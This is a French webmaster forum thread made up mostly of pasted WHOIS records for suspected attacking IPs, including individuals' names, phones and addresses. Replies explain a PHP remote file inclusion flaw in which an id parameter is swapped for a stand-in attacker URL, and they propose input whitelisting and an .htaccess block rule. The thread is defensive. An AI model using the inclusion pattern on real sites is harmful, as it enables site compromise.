address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: hostmaster_AT_nic.ad.jp
admin-c: JI13-AP
tech-c: JE53-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: hm-changed_AT_apnic.net 20041222
changed: hm-changed_AT_apnic.net 20050324
changed: ip-apnic_AT_nic.ad.jp 20051027
source: APNIC
inetnum: 202.216.176.0 - 202.216.191.255
netname: TAC-NET
descr: Tokoname New-TV Corporation
country: JP
admin-c: YF743JP
tech-c: YF743JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed: apnic-ftp_AT_nic.ad.jp 20030217
source: JPNIC
196.29.201.170 - MU -
Le serveur whois.arin.net à retourné l'information suivante :
OrgName: African Network Information Center
OrgID: AFRINIC
Address: 03B3 - 3rd Floor - Ebene Cyber Tower
Address: Cyber City
Address: Ebene
Address: Mauritius
City: Ebene
StateProv:
PostalCode: 0001
Country: MU
ReferralServer: whois://whois.afrinic.net
NetRange: 196.0.0.0 - 196.255.255.255
CIDR: 196.0.0.0/8
NetName: NET196
NetHandle: NET-196-0-0-0-0
Parent:
NetType: Allocated to AfriNIC
NameServer: NS1.AFRINIC.NET
NameServer: NS-SEC.RIPE.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
Comment:
RegDate: 1993-05-01
Updated: 2006-04-27
OrgAbuseHandle: GENER11-ARIN
OrgAbuseName: Generic POC
OrgAbusePhone: +230 4666616
OrgAbuseEmail: abusepoc_AT_afrinic.net
OrgTechHandle: GENER11-ARIN
OrgTechName: Generic POC
OrgTechPhone: +230 4666616
OrgTechEmail: abusepoc_AT_afrinic.net
# ARIN WHOIS database, last updated 2008-03-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
196.217.249.190 - MU -
adsl196-190-249-217-196.adsl196-16.iam.net.ma.
Le serveur whois.arin.net à retourné l'information suivante :
OrgName: African Network Information Center
OrgID: AFRINIC
Address: 03B3 - 3rd Floor - Ebene Cyber Tower
Address: Cyber City
Address: Ebene
Address: Mauritius
City: Ebene
StateProv:
PostalCode: 0001
Country: MU
ReferralServer: whois://whois.afrinic.net
NetRange: 196.0.0.0 - 196.255.255.255
CIDR: 196.0.0.0/8
NetName: NET196
NetHandle: NET-196-0-0-0-0
Parent:
NetType: Allocated to AfriNIC
NameServer: NS1.AFRINIC.NET
NameServer: NS-SEC.RIPE.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
Comment:
RegDate: 1993-05-01
Updated: 2006-04-27
OrgAbuseHandle: GENER11-ARIN
OrgAbuseName: Generic POC
OrgAbusePhone: +230 4666616
OrgAbuseEmail: abusepoc_AT_afrinic.net
OrgTechHandle: GENER11-ARIN
OrgTechName: Generic POC
OrgTechPhone: +230 4666616
OrgTechEmail: abusepoc_AT_afrinic.net
# ARIN WHOIS database, last updated 2008-03-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
218.106.254.83 - CN - CHINA
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 218.106.240.0 - 218.106.255.255
netname: CNCGROUP-BJ
descr: CNCGROUP Beijing province network
country: CN
admin-c: CH455-AP
tech-c: SY21-AP
status: ASSIGNED NON-PORTABLE
changed: abuse_AT_china-netcom.com 20070716
mnt-by: MAINT-CNCGROUP
mnt-lower: MAINT-CNCGROUP-BJ
source: APNIC
route: 218.104.0.0/14
descr: CNC Group CncNet
country: CN
origin: AS9929
mnt-by: MAINT-CNCGROUP-RR
changed: abuse_AT_cnc-noc.net 20060329
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
person: sun ying
address: fu xing men nei da jie 97, Xicheng District
address: Beijing 100800
country: CN
phone: +86-10-66030657
fax-no: +86-10-66078815
e-mail: suny_AT_publicf.bta.net.cn
nic-hdl: SY21-AP
mnt-by: MAINT-CNCGROUP-BJ
changed: suny_AT_publicf.bta.net.cn 19980824
changed: hm-changed_AT_apnic.net 20060717
source: APNIC
Localisation géographique par IP - IP geographical localization
221.13.66.161 - CN - CHINA
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 221.13.64.0 - 221.13.95.255
netname: CNCGROUP-XZ
descr: CNC Group Xizang province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
tech-c: CH455-AP
remarks: service provider
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-XZ
mnt-routes: MAINT-CNCGROUP-RR
status: ALLOCATED PORTABLE
changed: hm-changed_AT_apnic.net 20030528
changed: hm-changed_AT_apnic.net 20060124
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
196.205.94.68 - ON -
host-196-205-94-68.static.link.com.eg.
Le serveur whois.ripe.net à retourné l'information suivante :
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag
% Information related to '196.205.0.0 - 196.205.255.255'
inetnum: 196.205.0.0 - 196.205.255.255
org: ORG-AFNC1-RIPE
netname: AFRINIC-NET-TRANSFERRED-20050223
descr: This network has been transferred to AFRINIC
remarks: These IP addresses are assigned in the AFRINIC region.
remarks: Authoritative registration information for this network
remarks: is available for query and modification in
remarks: the AFRINIC whois database: whois.afrinic.net or
remarks: web site: http://www.afrinic.net
remarks: The routing registry information (route(6) objects)
remarks: may be published in any Routing Registry, including
remarks: RIPE Whois Database
country: EU # country is really somewhere in African Region
admin-c: AFRI-RIPE
tech-c: AFRI-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-routes: RIPE-NCC-RPSL-MNT
source: RIPE # Filtered
organisation: ORG-AFNC1-RIPE
org-name: African Internet Numbers Registry
org-type: RIR
address: see http://www.afrinic.net
e-mail: bitbucket_AT_ripe.net
admin-c: AFRI-RIPE
tech-c: AFRI-RIPE
remarks: For more information on AFRINIC assigned blocks, use
remarks: AFRINIC's whois database, whois.afrinic.net.
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
role: The African Internet Numbers Registry
org: ORG-AFNC1-RIPE
address: AFRINIC, see http://www.afrinic.net
admin-c: AFRI-RIPE
tech-c: AFRI-RIPE
nic-hdl: AFRI-RIPE
e-mail: bitbucket_AT_ripe.net
remarks: For more information on AFRINIC assigned blocks, connect
remarks: to AFRINIC's whois database, whois.afrinic.net.
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
% Information related to '196.205.0.0/16AS24863'
route: 196.205.0.0/16
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
% Information related to '196.205.92.0/22AS24863'
route: 196.205.92.0/22
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
% Information related to '196.205.88.0/21AS24863'
route: 196.205.88.0/21
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
% Information related to '196.205.0.0/17AS24863'
route: 196.205.0.0/17
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
222.129.202.131 - CN - CHINA
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 222.128.0.0 - 222.131.255.255
netname: CNCGROUP-BJ
descr: CNCGROUP Beijing province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
tech-c: SY21-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-BJ
mnt-routes: MAINT-CNCGROUP-RR
changed: hm-changed_AT_apnic.net 20031119
status: ALLOCATED PORTABLE
changed: hm-changed_AT_apnic.net 20060124
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
person: sun ying
address: fu xing men nei da jie 97, Xicheng District
address: Beijing 100800
country: CN
phone: +86-10-66030657
fax-no: +86-10-66078815
e-mail: suny_AT_publicf.bta.net.cn
nic-hdl: SY21-AP
mnt-by: MAINT-CNCGROUP-BJ
changed: suny_AT_publicf.bta.net.cn 19980824
changed: hm-changed_AT_apnic.net 20060717
source: APNIC
78.47.78.82 - DE - GERMANY
static.82.78.47.78.clients.your-server.de.
Le serveur whois.ripe.net à retourné l'information suivante :
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '78.47.78.80 - 78.47.78.87'
inetnum: 78.47.78.80 - 78.47.78.87
netname: RIVERLAND
descr: Riverland
country: DE
admin-c: NS2063-RIPE
tech-c: NS2063-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE # Filtered
person: Norbert Schneider
address: Riverland
address: Nymphenburger Str. 147a
address: 80634 München
address: GERMANY
phone: +49 89255575588
fax-no: +49 89255575589
e-mail: daniel_AT_inovativa.de
nic-hdl: NS2063-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
% Information related to '78.46.0.0/15AS24940'
route: 78.46.0.0/15
descr: HETZNER-RZ-NBG-BLK5
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
Attn. Martin Hetzner
Industriestr. 6
91710 Gunzenhausen
Germany
phone: +49 9831 610061
fax-no: +49 9831 610062
e-mail: info_AT_hetzner.de
admin-c: GM834-RIPE
admin-c: MH375-RIPE
admin-c: RB1502-RIPE
admin-c: SK2374-RIPE
admin-c: HOAC1-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
Pour info la page demandé était (http://) www.filter-international.com/webservice/aro/ipedido/a/ ou se situe un script php.
Ce site a a mon avis lui aussi été hacké.
Voila peut etre quelqu'un pourrat en dire plus
**EDIT Administrateur (TheRec)** Merci d'utiliser la balise CODEBOX à la place de CODE pour présenter un code long.
Après mes déboires, j'ai été aidé par différentes personnes que je remercie.
Je vous explique une erreur:
Voici le genre de choses classiques que j'avais dans mon site:
http://www.monsite.com/mapage.php?id=502
et plus loin un GET pour récupérer cette valeur de id,
puis un include comprenant cette valeur (entre autre).
Résultat: tout le monde peut remplacer 502 par http://www.site-pirate.com
C'est facile à tester!
Il faut donc ajouter un peu de code pour tester la validité de id avant l'include.
Le mieux est de n'autoriser que les valeurs existantes de id, mais on peut aussi filtrer et stopper si id n'est pas constitué de car alphanumériques.
Un htmlentities() ne suffit pas.
Bien sûr, c'est vexant d'être lâchement attaqué, mais c'est plus efficace de corriger son code que de faire des enquêtes pour essayer de découvrir qui est à l'origine des attaques.
Bonne chance et dites nous si ça marche!
Je vous explique une erreur:
Voici le genre de choses classiques que j'avais dans mon site:
http://www.monsite.com/mapage.php?id=502
et plus loin un GET pour récupérer cette valeur de id,
puis un include comprenant cette valeur (entre autre).
Résultat: tout le monde peut remplacer 502 par http://www.site-pirate.com
C'est facile à tester!
Il faut donc ajouter un peu de code pour tester la validité de id avant l'include.
Le mieux est de n'autoriser que les valeurs existantes de id, mais on peut aussi filtrer et stopper si id n'est pas constitué de car alphanumériques.
Un htmlentities() ne suffit pas.
Bien sûr, c'est vexant d'être lâchement attaqué, mais c'est plus efficace de corriger son code que de faire des enquêtes pour essayer de découvrir qui est à l'origine des attaques.
Bonne chance et dites nous si ça marche!
le mieux étant d'interdire les http:// dans le request_uri avec RewriteRule http - [NC,F,L] dans le htaccess
Bonjour,
Comme je l'ai dit plus haut, j'ai été amené à désactiver des fonctions dans l'urgence. Maintenant, j'aimerais les réintroduire si elles sont ok, donc j'ai posé une question précise sur la sécurité des "post" ici:
http://www.webmaster-hub.com/index.php?sho...mp;#entry264546
Merci de me donner votre avis.
Comme je l'ai dit plus haut, j'ai été amené à désactiver des fonctions dans l'urgence. Maintenant, j'aimerais les réintroduire si elles sont ok, donc j'ai posé une question précise sur la sécurité des "post" ici:
http://www.webmaster-hub.com/index.php?sho...mp;#entry264546
Merci de me donner votre avis.
Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'information, la mise en page et les images, veuillez cliquer ici.